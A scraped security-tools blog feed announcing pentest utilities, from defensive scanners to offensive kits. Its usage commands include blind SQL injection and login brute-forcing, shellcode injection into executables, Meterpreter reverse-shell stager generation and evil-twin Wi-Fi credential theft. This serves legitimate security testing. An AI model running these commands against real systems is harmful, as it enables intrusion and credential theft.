Quantcast
Channel: KitPloit - PenTest Tools!
Viewing all 5816 articles
Browse latest View live

MultiScanner - Modular File Scanning/Analysis Framework

April 21, 2017, 7:23 am
$
0
0

MultiScanner is a file analysis framework that assists the user in evaluating a set of files by automatically running a suite of tools for the user and aggregating the output. Tools can be custom built python scripts, web APIs, software running on another machine, etc. Tools are incorporated by creating modules that run in the MultiScanner framework.
Modules are designed to be quickly written and easily incorporated into the framework. Currently written and maintained modules are related to malware analytics, but the framework is not limited to that scope. For a list of modules you can look in modules, descriptions and config options can be found in docs/modules.md

Requirements
Python 2.7 is recommended. Compatibility with 2.7+ and 3.3+ is supported but not thoroughly maintained and tested. Please submit an issue or a pull request fixing any issues found with other versions of Python.
An installer script is included in the project install.sh, which installs the prerequisites on most systems.

Installation

MultiScanner
If you're running on a RedHat or Debian based linux distribution you should try and run install.sh. Otherwise the required python packages are defined in requirements.txt.
MultiScanner must have a configuration file to run. Generate the MultiScanner default configuration by running python multiscanner.py init after cloning the repository. This command can be used to rewrite the configuration file to its default state or, if new modules have been written, to add their configuration to the configuration file.

Analytic Machine
Default modules have the option to be run locally or via SSH. The development team runs MultiScanner on a Linux host and hosts the majority of analytical tools on a separate Windows machine. The SSH server used in this environment is freeSSHd from http://www.freesshd.com/.
A network share accessible to both the MultiScanner and the Analytic Machines is required for the multi-machine setup. Once configured, the network share path must be identified in the configuration file, config.ini. To do this, set the copyfilesto option under [main] to be the mount point on the system running MultiScanner. Modules can have a replacement path option, which is the network share mount point on the analytic machine.

Module Writing
Modules are intended to be quickly written and incorporated into the framework. A finished module must be placed in the modules folder before it can be used. The configuration file does not need to be manually updated. See docs/module_writing.md for more information.

Module Configuration
Modules are configured within the configuration file, config.ini. See docs/modules.md for more information.

Python API
MultiScanner can be incorporated as a module in another projects. Below is a simple example of how to import MultiScanner into a Python script.
import multiscanner
output = multiscanner.multiscan(FileList)
Results = multiscanner.parse_reports(output, python=True)
Results is a dictionary object where each key is a filename of a scanned file.
multiscanner.config_init(filepath) will create a default configuration file at the location defined by filepath.

Other Reading
For more information on module configuration or writing modules check the docs folder.


Search

Truehunter - Tool to detect TrueCrypt containers

April 21, 2017, 2:57 pm
$
0
0

The goal of Truehunter is to detect TrueCrypt containers using a fast and memory efficient approach. It was designed as a PoC some time ago as I couldn't find any open source tool with the same functionality.

Installation
Just use with Python 2.7, it does not need any additional libraries.

usage: truehunter.py [-h] [-D HEADERSFILE] [-m MINSIZE] [-M MAXSIZE]
[-R MAXHEADER] [-f] [-o OUTPUTFILE]
LOCATION
Checks for file size, unknown header, and entropy of files to determine if
they are encrypted containers.
positional arguments:
LOCATION Drive or directory to scan.
optional arguments:
-h, --help show this help message and exit.
-D HEADERSFILE, --database HEADERSFILE
Headers database file, default headers.db
-m MINSIZE, --minsize MINSIZE
Minimum file size in Kb, default 1Mb.
-M MAXSIZE, --maxsize MAXSIZE
Maximum file size in Kb, default 100Mb.
-R MAXHEADER, --repeatHeader MAXHEADER
Discard files with unknown headers repeated more than
N times, default 3.
-f, --fast Do not calculate entropy.
-o OUTPUTFILE, --outputfile OUTPUTFILE
Scan results file name, default scan_results.csv


DBShield - Database Firewall Written In Go

April 22, 2017, 7:40 am
$
0
0
Protects your data by inspecting incoming queries from your application server and rejecting abnormal ones.

How it works?
For example, this is how web server normally interacts with database server:


By adding DBShield in front of database server we can protect it against abnormal queries. To detect abnormal queries we first run DBShield in learning mode. Learning mode lets any query pass but it records information about it (pattern, username, time and source) into the internal database.


After collecting enough patterns we can run DBShield in protect mode. Protect mode can distinguish abnormal query pattern, user and source and take action based on configurations.


Demo
For demo, we are using sqlmap(automatic SQL injection and database takeover tool) to exploit the SQL injection vulnerability at user.php
In the first scenario, the sqlmap successfully exploits the SQL injection when web application connected directly to the database(MySQL), In the second scenario, we modify the user.php so DBShield gets between the web application and database which will drop the injection attempt and make sqlmap fail.


Sample Outputs
CLI
$ go run main.go
2016/10/15 16:25:31 [INFO]  Config file: /etc/dbshield.yml
2016/10/15 16:25:31 [INFO]  Internal DB: /tmp/model/10.0.0.21_postgres.db
2016/10/15 16:25:31 [INFO]  Listening: 0.0.0.0:5000
2016/10/15 16:25:31 [INFO]  Backend: postgres (10.0.0.21:5432)
2016/10/15 16:25:31 [INFO]  Protect: true
2016/10/15 16:25:31 [INFO]  Web interface on https://127.0.0.1:8070/
2016/10/15 16:25:33 [INFO]  Connected from: 10.0.0.20:35910
2016/10/15 16:25:33 [INFO]  Connected to: 10.0.0.21:5432
2016/10/15 16:25:33 [INFO]  SSL connection
2016/10/15 16:25:34 [DEBUG] Client handshake done
2016/10/15 16:25:34 [DEBUG] Server handshake done
2016/10/15 16:25:34 [INFO]  User: postgres
2016/10/15 16:25:34 [INFO]  Database: test
2016/10/15 16:25:34 [INFO]  Query: SELECT * FROM stocks where id=-1 or 1=1
2016/10/15 16:25:34 [WARN]  Pattern not found: [53 55 51 52 55 52 50 53 55 51 53 49 115 116 111 99 107 115 53 55 51 53 50 105 100 54 49 52 53 53 55 51 55 57 53 55 52 48 52 53 55 51 55 57 54 49 53 55 51 55 57] (SELECT * FROM stocks where id=-1 or 1=1)
2016/10/15 16:25:34 [WARN]  Dropping connection

Web Interface



Installation
Get it
$ go get -u github.com/nim4/DBShield
Then you can see help using "-h" argument:
$ $GOPATH/bin/DBShield -h
DBShield 1.0.0-beta3
Usage of DBShield:
  -a get list of abnormal queries
  -c file
      config file (default "/etc/dbshield.yml")
  -h show help
  -k show parsed config and exit
  -l get list of captured patterns
  -version
      show version
and run it with your configuration, like:
$ $GOPATH/bin/DBShield -c config.yml
see sample configuration file

Supports:
DatabaseProtectSSL
DB2YesNo
MariaDBYesYes
MySQLYesYes
OracleYesNo
PostgresYesYes

Blindy - Simple Script for running BruteForce Blind MySql Injection

April 23, 2017, 7:43 am
$
0
0

Simple script for running bruteforce blind MySql injection
The script will run through queries listed in sets in provided file (default-queries.json as default) and try to bruteforce places with {} placeholder. If no {} placeholder present, the script will simply make request with current query.

command line
$ python3 blindy.py --help
usage: blindy.py [-h] [-f filename] [-m method] -p name -r regexp -u url
                 [-s set_of_queries]

Run blind sql injection using brutforce

optional arguments:
  -h, --help            show this help message and exit
  -f filename           File name for your commands in json format, defaults
                        to default-queries.json
  -m method, --method method
                        Where to inject (GET - get parameter/default, POST -
                        post parameter, HEADER - header)
  -p name               Name of parameter (for get - param name, post - param
                        name, for header - name of header). If params need to
                        have fixed value use -p submit=true
  -r regexp             Regular expression for negative pattern (script search
                        for the pattern and if present - will consider that
                        injection failed and igrone result.)
  -u url                Url to test
  -s set_of_queries, --set set_of_queries
                        Which set of queries to analyze from json file, for
                        ex. login, blind. Default to blind.

Example usage
Bruteforce inject into POST query_param
python3 blindy.py -m POST -p query_param -p submit=1 -r 'Pattern\ to\ ignore\ result' -u http://example.com/index.php -s blind
Bruteforce inject into POST query_param with placeholder
python3 blindy.py -m POST -p "query_param=login {}" -p submit=1 -r 'Pattern\ to\ ignore\ result' -u http://example.com/index.php -s blind
This will inject the queries in a place of {} parameter placeholder
Simple check a list of queries against username parameter
python3 blindy.py -m POST -p username -p submit=1 -r 'Pattern\ to\ ignore\ result' -u http://example.com/login.php -s login


PowerMeta - PowerShell Script to Search Publicly Files for a Particular Domain and Get the Associated MetaData

April 24, 2017, 7:30 am
$
0
0

PowerMeta searches for publicly available files hosted on various websites for a particular domain by using specially crafted Google, and Bing searches. It then allows for the download of those files from the target domain. After retrieving the files, the metadata associated with them can be analyzed by PowerMeta. Some interesting things commonly found in metadata are usernames, domains, software titles, and computer names.

Public File Discovery
For many organizations it's common to find publicly available files posted on their external websites. Many times these files contain sensitive information that might be of benefit to an attacker like usernames, domains, software titles or computer names. PowerMeta searches both Bing and Google for files on a particular domain using search strings like "site:targetdomain.com filetype:pdf". By default it searches for "pdf, docx, xlsx, doc, xls, pptx, and ppt".

Metadata Extraction
PowerMeta uses Exiftool by Phil Harvey to extract metadata information from files. If you would prefer to download the binary from his site directly instead of using the one in this repo it can be found here: http://www.sno.phy.queensu.ca/~phil/exiftool/. Just make sure the exiftool executable is in the same directory as PowerMeta.ps1 when it is run. By default it just extracts the 'Author' and 'Creator' fields as these commonly have usernames saved. However all metadata for files can be extracted by passing PowerMeta the -ExtractAllToCsv flag.

Usage

Basic Search
This command will initiate Google and Bing searches for files on the 'targetdomain.com' domain ending with a file extension of pdf, docx, xlsx, doc, xls, pptx, or pptx. Once it has finished crafting this list it will prompt the user asking if they wish to download the files from the target domain. After downloading files it will prompt again for extraction of metadata from those files.
C:\PS> Invoke-PowerMeta -TargetDomain targetdomain.com

Changing FileTypes and Automatic Download and Extract
This command will initiate Google and Bing searches for files on the 'targetdomain.com' domain ending with a file extension of pdf, or xml. It will then automatically download them from the target domain and extract metadata.
C:\PS> Invoke-PowerMeta -TargetDomain targetdomain.com -FileTypes "pdf, xml" -Download -Extract

Downloading Files From A List
This command will initiate Google and Bing searches for files on the 'targetdomain.com' domain ending with a file extension of pdf, docx, xlsx, doc, xls, pptx, or pptx and write the links of files found to disk in a file called "target-domain-links.txt".
C:\PS> Invoke-PowerMeta -TargetDomain targetdomain.com -TargetFileList target-domain-links.txt

Extract All Metadata and Limit Page Search
This command will initiate Google and Bing searches for files on the 'targetdomain.com' domain ending with a file extension of pdf, docx, xlsx, doc, xls, pptx, or pptx but only search the first two pages. All metadata (not just the default fields) will be saved in a CSV called all-target-metadata.csv.
C:\PS> Invoke-PowerMeta -TargetDomain targetdomain.com -MaxSearchPages 2 -ExtractAllToCsv all-target-metadata.csv

Extract Metadata From Files In A Directory
This command will simply extract all the metadata from all the files in the folder "\2017-03-031-144953" and save it in a CSV called all-target-metadata.csv
C:\PS> ExtractMetadata -OutputDir .\2017-03-031-144953\ -ExtractAllToCsv all-target-metadata.csv

PowerMeta Options
TargetDomain        - The target domain to search for files. 
FileTypes           - A comma seperated list of file extensions to search for. By default PowerMeta searches for "pdf, docx, xlsx, doc, xls, pptx, ppt".
OutputList          - A file to output the list of links discovered through web searching to. 
OutputDir           - A directory to store all downloaded files in.
TargetFileList      - List of file links to download.
Download            - Instead of being prompted interactively pass this flag to auto-download files found.
Extract             - Instead of being prompted interactively pass this flag to extract metadata from found files pass this flag to auto-extract any metadata.
ExtractAllToCsv     - All metadata (not just the default fields) will be extracted from files to a CSV specified with this flag.
UserAgent           - Change the default User Agent used by PowerMeta.
MaxSearchPages      - The maximum number of pages to search on each search engine.


WPSeku - Simple Wordpress Security Scanner

April 25, 2017, 7:14 am
$
0
0

WPSeku is a black box WordPress vulnerability scanner that can be used to scan remote WordPress installations to find security issues.

Usage
                           _             
  __      ___ __  ___  ___| | ___   _    
  \ \ /\ / / '_ \/ __|/ _ \ |/ / | | |   
   \ V  V /| |_) \__ \  __/   <| |_| |   
    \_/\_/ | .__/|___/\___|_|\_\\__,_|   
           |_|                           
[--] WPSeku - Wordpress Security Scanner  
[--] WPSeku - v0.1.0                      
[--] Momo Outaadi (@M4ll0k)               
[--] https://github.com/m4ll0k/WPSeku   

Usage: wpseku.py --url URL

 -u --url Site URL (e.g: http://site.com)
 -e --enum 
  [u:  Usernames Enumeration
 -p --plugin 
  [x:  Search Cross Site Scripting vuln
  [l:  Search Local File Inclusion vuln
  [s:  Search SQL Injection vuln
 -t --theme 
  [x:  Search Cross Site Scripting vuln
  [l:  Search Local File Inclusion vuln
  [s:  Search SQL Injection vuln
 -b --brute 
  [l:  Bruteforce password login
  [x:  Bruteforce password login via XML-RPC
 --user  Set username, try with enum users
 --wordlist Set wordlist
 -h --help Show this help and exit
Examples:
  wpseku.py -u www.site.com
  wpseku.py -u www.site.com -e [u]
  wpseku.py -u site.com/path/wp-content/plugins/wp/wp.php?id= -p [x,l,s]
  wpseku.py -u site.com --user test --wordlist dict.txt -b [l,x]

Screenshot


Kali Linux 2017.1 Release

April 25, 2017, 3:53 pm
$
0
0

As with all new releases, you have the common denominator of updated packages, an updated kernel that provides more and better hardware support, as well as a slew of updated tools – but this release has a few more surprises up its sleeve.

Support for RTL8812AU Wireless Card Injection

These drivers are not part of the standard Linux kernel, and have been modified to allow for injection. Why is this a big deal? This chipset supports 802.11 AC, making this one of the first drivers to bring injection-related wireless attacks to this standard, and with companies such as ALFA making the AWUS036ACH wireless cards, we expect this card to be an arsenal favourite.

The driver can be installed using the following commands:
apt-get update
apt install realtek-rtl88xxau-dkms

Streamlined Support for CUDA GPU Cracking

Installing proprietary graphics drivers has always been a source of frustration in Kali. Fortunately, improvements in packaging have made this process seamless – allowing our users a streamlined experience with GPU cracking. Together with supported hardware, tools such as Hashcat and Pyrit can take full advantage of NVIDIA GPUs within Kali. For more information about this new feature, check out the related blog post and updated official documentation.

Amazon AWS and Micsosoft Azure Availability (GPU Support)

Due to the increasing popularity of using cloud-based instances for password cracking, we decided to focus our efforts into streamlining Kali’s approach. Amazon’s AWS P2-Series and Microsoft’s Azure NC-Series allow pass-through GPU support so we made corresponding AWS and Azure images of Kali that support CUDA GPU cracking out of the box. You can check out Cracking in the Cloud with CUDA GPUs.

OpenVAS 9 Packaged in Kali Repositories

One of the most lacking tool categories in Kali (as well as the open-source arena at large) is a fully-fledged vulnerability scanner. OpenVAS isn't include  in the default Kali release due to its large footprint, but OpenVAS can easily be downloaded and installed using the following commands:
apt-get update
apt install openvas


InfectPE - Inject Custom Code into PE File

April 26, 2017, 7:15 am
$
0
0

Using this tool you can inject x-code/shellcode into PE file. InjectPE works only with 32-bit executable files.

Why you need InjectPE?
  • You can test your security products.
  • Use in a phishing campaign.
  • Learn how PE injection works.
  • ...and so on.
In the project, there is hardcoded x-code of MessageBoxA, you can change it.

Download
Windows x86 binary - Hardcoded MessageBoxA x-code, only for demos.

Dependencies:
vc_redist.x86 - Microsoft Visual C++ Redistributable

Usage
.\InfectPE.exe .\input.exe .\out.exe code
X-code is injected into code section, this method is more stealthy, but sometimes there is no enough space in the code section.
.\InfectPE.exe .\input.exe .\out.exe largest
X-code is injected into a section with the largest number of zeros, using this method you can inject bigger x-code. This method modifies characteristics of the section and is a bit more suspicious.
.\InfectPE.exe .\input.exe .\out.exe resize
Expand the size of code section and inject x-code. This technique, like "code" one, is less suspicious, also you can inject much bigger x-code.
In the patched file, ASLR and NX are disabled, for the more technical information you can analyze VS project.

Demo
"code" and "largest" techniques.

"resize" technique.


Search

Inspeckage - (Android Package Inspector) Dynamic Analysis With Api Hooks, Start Unexported Activities And More

April 27, 2017, 7:30 am
$
0
0

Inspeckage is a tool developed to offer dynamic analysis of Android applications. By applying hooks to functions of the Android API, Inspeckage will help you understand what an Android application is doing at runtime.

Features
With Inspeckage, we can get a good amount of information about the application's behavior:

Information gathering
  • Requested Permissions;
  • App Permissions;
  • Shared Libraries;
  • Exported and Non-exported Activities, Content Providers,Broadcast Receivers and Services;
  • Check if the app is debuggable or not;
  • Version, UID and GIDs;
  • etc.

Hooks (so far)
With the hooks, we can see what the application is doing in real time:
  • Shared Preferences (log and file);
  • Serialization;
  • Crypto;
  • Hashes;
  • SQLite;
  • HTTP (an HTTP proxy tool is still the best alternative);
  • File System;
  • Miscellaneous (Clipboard, URL.Parse());
  • WebView;
  • IPC;
  • + Hooks (add new hooks dynamically)

Actions
With Xposed it's possible to perform actions such as start a unexported activity and much else:
  • Start any activity (exported and unexported);
  • Call any provider (exported and unexported);
  • Disable FLAG_SECURE;
  • SSL uncheck (bypass certificate pinning - JSSE, Apache and okhttp3);
  • Start, stop and restart the application;
  • Replace params and return value (+Hooks tab).

Extras
  • APK Download;
  • View the app's directory tree;
  • Download the app's files;
  • Download the output generated by hooks in text file format;
  • Take a screen capture;
  • Send text to android clipboard.

Configuration
Even though our tool has some hooks to the HTTP libraries, using an external proxy tool is still the best option to analyze the app's traffic. With Inspeckage, you can:
  • Add a proxy to the target app;
  • Enable and disable proxy;
  • Add entries in the arp table.

Logcat
Logcat.html page. A experimental page with websocket to show some information from the logcat.

Installation
Requirements: Xposed Framework

Xposed Installer
  1. Go to Xposed Installer, select "Download"
  2. Refresh and search for "Inspeckage"
  3. Download the latest version and install
  4. Enable it in Xposed
  5. Reboot and enjoy!

Xposed Repository
Get it from Xposed repo: http://repo.xposed.info/module/mobi.acpm.inspeckage 
    adb install mobi.acpm.inspeckage.apk
  1. Enable it in Xposed
  2. Reboot and enjoy!

From Source
Feel free to download the source!

How to uninstall 
    adb uninstall mobi.acpm.inspeckage
And reboot!

Genymotion

Screenshots








Leviathan - Wide Range Mass Audit Toolkit

April 28, 2017, 7:04 am
$
0
0

Leviathan is a mass audit toolkit which has wide range service discovery, brute force, SQL injection detection and running custom exploit capabilities. It consists open source tools such masscan, ncrack, dsss and gives you the flexibility of using them with a combination.
The main goal of this project is auditing as many system as possible in country-wide or in a wide IP range.

Main Features
Discovery: Discover FTP, SSH, Telnet, RDP, MYSQL services running inside a specific country or in an IP range via Shodan, Censys. It's also possible to manually discover running services on a IP range by integrated “masscan” tool.
Brute Force: You can brute force the discovered services with integrated “ncrack” tool. It has wordlists which includes most popular combinations and default passwords for specific services.
Remote Command Execution: You can run system commands remotely on compromised devices.
SQL Injection Scanner: Discover SQL injection vulnerabilities on websites with specific country extension or with your custom Google Dork.
Exploit Specific Vulnerabilities: Discover vulnerable targets with Shodan, Censys or masscan and mass exploit them by providing your own exploit or using preincluded exploits.

Integrated Tools
Masscan: It’s a very fast TCP port scanner by Robert David Graham. Leviathan uses masscan for detecting services on a huge IP range. https://github.com/robertdavidgraham/masscan
Ncrack: Ncrack is a high-speed network authentication cracking tool. Leviathan uses ncrack to brute force services such as FTP, SSH, RDP, Telnet, MYSQL etc. https://github.com/nmap/ncrack
DSSS (Damn Small SQLi Scanner): DSSS is a fully functional and minimal SQL injection vulnerability scanner by Miroslav Stampar. Leviathan uses DSSS to identify SQL Injection vulnerabilities on specific URLs. https://github.com/stamparm/DSSS

Installation
For detailed installiation, please visit our wiki page.

Kali Linux:
Download leviathan by cloning the Git repository:
git clone https://github.com/leviathan-framework/leviathan.git
Go inside the folder
cd leviathan
Install Python libraries:
pip install -r requirements.txt
It's done!

Debian/Ubuntu:
Download leviathan by cloning the Git repository:
git clone https://github.com/leviathan-framework/leviathan.git
Go inside the folder
cd leviathan
Run installiation script. It will setup required tools (ncrack, masscan) and python libraries.
bash scripts/debian_install.sh
It's done!

macOS:
If homebrew is not installed on your system, please install it first:
/usr/bin/ruby -e "$(curl -fsSL https://raw.githubusercontent.com/Homebrew/install/master/install)"
Download leviathan by cloning the Git repository:
git clone https://github.com/leviathan-framework/leviathan.git
Go inside the folder
cd leviathan
Run installiation script. It will setup required tools (ncrack, masscan) and python libraries.
bash scripts/macos_install.sh
It's done!

Requirements
Python version 2.7.x is required for running this program.
Supported platforms: Linux (Kali Linux, Debian, Ubuntu), macOS

Usage
Run the program with following command:
python leviathan.py
You can get basic usage information inside the menus. For detailed usage manual, visit our wiki page.

Screenshots



Operative Framework v1.0b - Fingerprint Framework

April 29, 2017, 7:30 am
$
0
0


This is a framework based on fingerprint action, this tool is used for get information on a website or a enterprise target with multiple modules (Viadeo search, Linkedin search, Reverse email whois, Reverse ip whois, SQL file forensics ...)

Dependency & launching
  • pip install -r requirements.txt
  • python operative.py

Youtube

Campaign
  • You can start a (gathering/fingerprinting) campaign with :campaign command.
  • Update a value of YOURWEBSITE.COM / ENTERPRISE_NAME in config.json file.
  • You can add a module process for a customized campaign.

Core Modules
  • core/modules/cms_gathering
  • core/modules/domain_search
  • core/modules/email_to_domain
  • core/modules/https_gathering
  • core/modules/linkedin_search
  • core/modules/reverse_ipdomain
  • core/modules/search_db
  • core/modules/waf_gathering
  • core/modules/whois_domain
  • core/modules/generate_email
  • core/modules/viadeo_search
  • core/modules/file_common
  • core/modules/get_websiteurl
  • core/modules/getform_data
  • core/modules/subdomain_search
  • core/modules/vhost_IPchecker
  • core/modules/tools_suggester
  • core/modules/metatag_look
  • core/modules/header_retrieval

SQL File forensics
  • import database in core/dbs/
  • read table
  • read columns
  • search information with pattern

Write module
For write module look core/modules/sample_module class


PowerStager - A payload stager using PowerShell

April 30, 2017, 7:07 am
$
0
0

This script creates an executable stager that downloads a selected powershell payload, loads it into memory and executes it using obfuscated EC methods. The script will also encrypt the stager for dynamic signatures and some additional obfuscation.

This enables the actual payload to be executed indirectly without the victim downloading it, only by executing the stager. The attacker can then for example implement evasion techniques on the web server, hosting the payload, instead of in the stager itself.

Additional methods allows the payload to be embedded into the 'stager' and temporarily stored encrypted on disk for memory injection.

Not only are powershell powerful when managing Windows, it's also powerful when exploiting Windows. This script exploits multiple Windows features such as its inherit trust of powershell, interpretation of shorthand syntaxes, code evaluation and more...

How to use
Install it:
git clone https://github.com/z0noxz/powerstager
cd powerstager
sudo ./setup.py install
Generate a meterpreter payload to upload:
powerstager -t win64 -o out.ps1 -m --lhost 13.37.13.37 --lport 4444 --generate
powerstager -t win64 -o out.exe -u <url pointing the the uploaded payload>
Generate an embedded meterpreter payload:
powerstager -t win64 -o out.exe -m --lhost 13.37.13.37 --lport 4444
Generate an embedded custom payload:
powerstager -t win64 -o out.exe -p input.ps1


EAPHammer - Targeted Evil Twin Attacks Against WPA2-Enterprise Networks [Indirect Wireless Pivots Using Hostile Portal Attacks]

May 1, 2017, 7:18 am
$
0
0

EAPHammer is a toolkit for performing targeted evil twin attacks against WPA2-Enterprise networks. It is designed to be used in full scope wireless assessments and red team engagements. As such, focus is placed on providing an easy-to-use interface that can be leveraged to execute powerful wireless attacks with minimal manual configuration. To illustrate how fast this tool is, here's an example of how to setup and execute a credential stealing evil twin attack against a WPA2-TTLS network in just two commands:
# generate certificates
./eaphammer --cert-wizard

# launch attack
./eaphammer -i wlan0 --channel 4 --auth ttls --wpa 2 --essid CorpWifi --creds
Leverages a lightly modified version of hostapd-wpe, dnsmasq, dsniff, Responder, and Python 2.7.

Features
  • Steal RADIUS credentials from WPA-EAP and WPA2-EAP networks.
  • Perform hostile portal attacks to steal AD creds and perform indirect wireless pivots
  • Perform captive portal attacks
  • Built-in Responder integration
  • Support for Open networks and WPA-EAP/WPA2-EAP
  • No manual configuration necessary for most attacks.
  • No manual configuration necessary for installation and setup process

Upcoming Features
  • Perform seemeless MITM attacks with partial HSTS bypasses
  • Support attacks against WPA-PSK/WPA2-PSK
  • Support for SSID cloaking
  • Generate timed payloads for indirect wireless pivots
  • Integrated PowerShell payload generation
  • impacket integration for SMB relay attacks
  • directed rogue AP attacks (deauth then evil twin from PNL, deauth then karma + ACL)
  • Updated hostapd-wpe that works with the latest version of Hostapd
  • Integrated website cloner for cloning captive portal login pages
  • Integrated HTTP server
Will this tool ever support Karma attacks?
  • At some point yes, but for now the focus has been on directed evil twin attacks.
  • If Karma attacks are like a wireless grenade launcher, this tool is more like an easy-to-use wireless sniper rifle

Setup Guide

Kali Setup Instructions
Begin by cloning the eaphammer repo using the following command.
git clone https://github.com/s0lst1c3/eaphammer.git
Next run the kali-setup.py file as shown below to complete the eaphammer setup process. This will install dependencies and compile hostapd.
python setup.py

Other Distros
If you are not using Kali, you can still compile eaphammer. I just haven't written a setup script for your distro yet, which means you'll have to do it manually. Ask yourself whether you understand the following:
  • python-devel vs python-dev
  • service vs systemctl
  • network-manager vs NetworkManager
  • httpd vs apache2
If you looked at this list and immediately realized that each pair of items was to some extent equivalent (well, except for service vs systemctl, but you catch my drift), you'll probably have no problems getting this package to work on the distro of your choice. If not, please just stick with Kali until support is added for other distros.
With that out of the way, here are the generic setup instructions:
Use your package manager to install each of the dependencies listed in kali-dependencies.txt. Package names can vary slightly from distro to distro, so you may get a "package not found" error or similar. If this occurs, just use Google to find out what the equivalent package is for your distro and install that instead.
Once you have installed each of the dependencies listed in kali-dependencies.txt, you'll need to install some additional packages that ship with Kali by default. These packages are listed below. If you're on a distro that uses httpd instead of apache2, install that instead.
  • dsniff
  • apache2
Compile hostapd using the following commands:
cd hostapd-eaphammer
make
Open config.py in the text editor of your choice and edit the following lines so that to values that work for your distro:
# change this to False if you cannot/will not use systemd
use_systemd = True

# change this to 'NetworkManager' if necessary
network_manager = 'network-manager'

# change this 'httpd' if necessary
httpd = 'apache2'

Usage Guide

x.509 Certificate Generation
Eaphammer provides an easy-to-use wizard for generating x.509 certificates. To launch eaphammer's certificate wizard, just use the command shown below.
./eaphammer --cert-wizard

Stealing RADIUS Credentials From EAP Networks
To steal RADIUS credentials by executing an evil twin attack against an EAP network, use the --creds flag as shown below.
./eaphammer --bssid 1C:7E:E5:97:79:B1 --essid Example --channel 2 --interface wlan0 --auth ttls --creds
The flags shown above are self explanatory. For more granular control over the attack, you can use the --wpa flag to specify WPA vs WPA2 and the --auth flag to specify the eap type. Note that for cred reaping attacks, you should always specify an auth type manually since the the --auth flag defaults to "open" when omitted.
./eaphammer --bssid 00:11:22:33:44:00 --essid h4x0r --channel 4 --wpa 2 --auth ttls --interface wlan0 --creds
Please refer to the options described in Additional Options section of this document for additional details about these flags.

Stealing AD Credentials Using Hostile Portal Attacks
Eaphammer can perform hostile portal attacks that can force LLMNR/NBT-NS enabled Windows clients into surrendering password hashes. The attack works by forcing associations using an evil twin attack, then forcing associated clients to attempt NetBIOS named resolution using a Redirect To SMB attack. While this occurs, eaphammer runs Responder in the background to perform a nearly instantaneous LLMNR/NBT-NS poisoning attack against the affected wireless clients. The result is an attack that causes affected devices to not only connect to the rogue access point, but send NTLM hashes to the rogue access point as well.
The --hostile-portal flag can be used to execute a hostile portal attack, as shown in the examples below.
./eaphammer --interface wlan0 --bssid 1C:7E:E5:97:79:B1 --essid EvilC0rp --channel 6 --auth peap --wpa 2 --hostile-portal

./eaphammer --interface wlan0 --essid TotallyLegit --channel 1 --auth open --hostile-portal

Performing Indirect Wireless Pivots Using Hostile Portal Attacks
The hostile portal attack described in Stealing AD Credentials Using Hostile Portal Attacks can be used to perform an SMB relay attack against the affected devices. An attacker can use hostile portal attack to perform an SMB relay attack that places timed reverse shell on an authorized wireless devices. The attacker can then disengage the attack to allow the authorized device to reconnect to the targetted network. When the attacker receives the reverse shell, he or she will have the same level of authorization as the attacker.

Performing Captive Portal Attacks
To perform a captive portal attack using eaphammer, use the --captive-portal flag as shown below.
./eaphammer --bssid 1C:7E:E5:97:79:B1 --essid HappyMealz --channel 6 --interface wlan0 --captive-portal
This will cause eaphammer to execute an evil twin attack in which the HTTP(S) traffic of all affected wireless clients are redirected to a website you control. Eaphammer will leverage Apache2 to serve web content out of /var/www/html if used with the default Apache2 configuration. Future iterations of eaphammer will provide an integrated HTTP server and website cloner for attacks against captive portal login pages.

Additional Options
  • --cert-wizard - Use this flag to create a new RADIUS cert for your AP.
  • -h, --help - Display detailed help message and exit.
  • -i, --interface - Specify the a PHY interface on which to create your AP.
  • -e ESSID, --essid ESSID - Specify access point ESSID.
  • -b BSSID, --bssid BSSID - Specify access point BSSID.
  • --hw-mode HW-MODE - Specify access point hardware mode (default: g).
  • -c CHANNEL, --channel CHANNEL - Specify access point channel.
  • --wpa {1,2} - Specify WPA type (default: 2).
  • --auth {peap,ttls,open} - Specify auth type (default: open).
  • --creds - Harvest EAP creds using an evil twin attack.
  • --hostile-portal - Force clients to connect to hostile portal.
  • --captive-portal - Force clients to connect to a captive portal.


Infoga v3.0 - Email Information Gathering

May 2, 2017, 7:30 am
$
0
0

Infoga is a tool for gathering e-mail accounts information from different public sources (search engines, pgp key servers). Is a really simple tool, but very effective for the early stages of a penetration test or just to know the visibility of your company in the Internet.

Installation

git clone https://github.com/m4ll0k/Infoga.git
cd Infoga
pip install -r requires.txt
python infoga.py

ScreenShots


Web Exploit Detector - Tool To Detect Possible Infections, Malicious Code And Suspicious Files In Web Hosting Environments

May 3, 2017, 7:28 am
$
0
0

The Web Exploit Detector is a Node.js application (and NPM module) used to detect possible infections, malicious code and suspicious files in web hosting environments. This application is intended to be run on web servers hosting one or more websites. Running the application will generate a list of files that are potentially infected together with a description of the infection and references to online resources relating to it.

As of version 1.1.0 the application also includes utilities to generate and compare snapshots of a directory structure, allowing users to see if any files have been modified, added or removed.
The application is hosted here on GitHub so that others can benefit from it, as well as allowing others to contribute their own detection rules.

Installation

Regular users
The simplest way to install Web Exploit Detector is as a global NPM module: -
npm install -g web_exploit_detector
If you are running Linux or another Unix-based OS you might need to run this command as root (e.g. sudo npm install -g web_exploit_detector).

Updating
The module should be updated regularly to make sure that all of the latest detection rules are present. Running the above command will always download the latest stable (tested) version. To update a version that has already been installed, simply run the following: -
npm update -g web_exploit_detector
Again, you may have to use the sudo command as above.

Technical users
You can also clone the Git repository and run the script directly like so: -
  1. git clone https://github.com/polaris64/web_exploit_detector
  2. cd web_exploit_detector
  3. npm install

Running

From NPM module
If you have installed Web Exploit Detector as an NPM module (see above) then running the scanner is as simple as running the following command, passing in the path to your webroot (location of your website files): -
wed-scanner --webroot=/var/www/html
Other command-line options are available, simply run wed-scanner --help to see a help message describing them.
Running the script in this way will produce human-readable output to the console. This is very useful when running the script with cron for example as the output can be sent as an e-mail whenever the script runs.
The script also supports the writing of results to a more computer-friendly JSON format for later processing. To enable this output, see the --output command line argument.

From cloned Git repository
Simply call the script via node and pass the path to your webroot as follows: -
node index.js --webroot=/var/www/html

Recursive directory snapshots
The Web Exploit Detector also comes with two utilities to help to identify files that might have changed unexpectedly. A successful attack on a site usually involves deleting files, adding new files or changing existing files in some way.

Snapshots
A snapshot (as used by these utilities) is a JSON file which lists all files as well as a description of their contents at the point in which the snapshot was created. If a snapshot was generated on Monday, for example, and then the site was attacked on Tuesday, then running a comparison between this snapshot and the current site files afterwards will show that one or more files were added, deleted or changed. The goal of these utilities therefore is to allow these snapshots to be created and for the comparisons to be performed when required.
